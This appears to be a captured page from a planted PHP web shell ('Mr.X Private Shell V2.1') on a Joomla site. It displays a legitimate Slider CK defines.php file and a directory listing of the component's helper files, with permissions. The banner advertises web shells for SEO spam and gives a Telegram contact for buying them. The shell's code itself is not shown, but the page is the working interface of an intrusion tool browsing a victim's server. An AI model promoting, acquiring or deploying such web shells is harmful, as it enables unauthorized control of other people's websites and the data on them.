__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @name Slider CK
* @package com_sliderck
* @copyright Copyright (C) 2016. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
* @author Cedric Keiflin - http://www.template-creator.com - http://www.joomlack.fr
*/
// No direct access
defined('_JEXEC') or die;
// set variables
define('SLIDERCK_PLATFORM', 'joomla');
define('SLIDERCK_PATH', JPATH_SITE . '/administrator/components/com_sliderck');
define('SLIDERCK_ADMIN_PATH', SLIDERCK_PATH);
define('SLIDERCK_FRONT_PATH', JPATH_SITE . '/components/com_sliderck');
define('SLIDERCK_PROJECTS_PATH', JPATH_SITE . '/administrator/components/com_sliderck/projects');
define('SLIDERCK_ADMIN_URL', JUri::root(true) . '/administrator/index.php?option=com_sliderck');
define('SLIDERCK_URL', JUri::base(true) . '/index.php?option=com_sliderck');
define('SLIDERCK_ADMIN_GENERAL_URL', JUri::root(true) . '/administrator/index.php?option=com_sliderck&view=templates');
define('SLIDERCK_MEDIA_URI', JUri::root(true) . '/media/com_sliderck');
define('SLIDERCK_MEDIA_URL', SLIDERCK_MEDIA_URI);
define('SLIDERCK_MEDIA_PATH', JPATH_ROOT . '/media/com_sliderck');
define('SLIDERCK_PLUGIN_URL', SLIDERCK_MEDIA_URI);
define('SLIDERCK_TEMPLATES_PATH', JPATH_SITE . '/templates');
define('SLIDERCK_SITE_ROOT', JPATH_ROOT);
define('SLIDERCK_URI', JUri::root(true) . '/administrator/components/com_sliderck');
define('SLIDERCK_URI_ROOT', JUri::root(true));
define('SLIDERCK_URI_BASE', JUri::base(true));
define('SLIDERCK_PLUGINS_PATH', JPATH_SITE . '/plugins/sliderck');
// include the classes
require_once SLIDERCK_PATH . '/helpers/ckinput.php';
require_once SLIDERCK_PATH . '/helpers/cktext.php';
require_once SLIDERCK_PATH . '/helpers/ckfile.php';
require_once SLIDERCK_PATH . '/helpers/ckfolder.php';
require_once SLIDERCK_PATH . '/helpers/ckfof.php';
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| source | Folder | 0775 |
|
|
| ckbrowse.php | File | 6.7 KB | 0664 |
|
| ckcontroller.php | File | 7.2 KB | 0664 |
|
| ckfile.php | File | 124 B | 0664 |
|
| ckfof.php | File | 13.33 KB | 0664 |
|
| ckfolder.php | File | 130 B | 0664 |
|
| ckframework.php | File | 3.12 KB | 0664 |
|
| ckinput.php | File | 91 B | 0664 |
|
| ckinterface.php | File | 40.55 KB | 0664 |
|
| ckmodel.php | File | 3.27 KB | 0664 |
|
| ckpath.php | File | 124 B | 0664 |
|
| ckstyles.php | File | 46.39 KB | 0664 |
|
| cktext.php | File | 88 B | 0664 |
|
| ckuri.php | File | 86 B | 0664 |
|
| ckview.php | File | 1.15 KB | 0664 |
|
| defines.js.php | File | 1018 B | 0664 |
|
| defines.php | File | 1.81 KB | 0664 |
|
| helper.php | File | 18.31 KB | 0664 |
|
| htmlfixer.php | File | 13.99 KB | 0664 |
|
| index.html | File | 44 B | 0664 |
|
| sliderck.php | File | 3.21 KB | 0664 |
|